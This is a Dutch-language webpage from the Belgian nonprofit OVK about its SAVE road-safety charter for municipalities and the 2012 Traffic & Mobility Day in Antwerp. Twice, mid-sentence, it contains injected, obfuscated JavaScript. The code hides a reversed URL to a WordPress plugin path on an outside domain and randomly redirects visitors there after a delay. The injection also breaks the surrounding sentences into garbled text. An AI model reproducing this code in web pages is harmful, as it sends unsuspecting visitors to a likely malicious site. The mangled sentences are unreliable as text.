Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Dag van Verkeer en Mobiliteit 2012

http://www.verkeerenmobiliteit.be/uploads/images/pressimages/dvm2012blogodatumlocatieklein.jpg

Vakbeurs en lezingen over verkeerstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassingen en mobiliteitsoplossingen

De Dag van Verkeer & Mobiliteit is het grootste en enige Belgische verkeersevenement waar verkeersprofessionals elkaar op één dag ontmoeten. Onmisbaar als u bij de overheid werkt (gemeente, provincie, waterschap of rijksoverheid) of in het bedrijfsleven en verkeer en/of mobiliteit uw werkveld is.

Toegang is gratis, maar registratie op voorhand is gewenst.

De Dag van Verkeer & Mobiliteit België vindt plaats op donderdag 22 november 2012 in Antwerp expo. Openingstijden zijn van 10.00u toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot 17.00u.

Meer informatie kan u hier terug vinden.

 


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be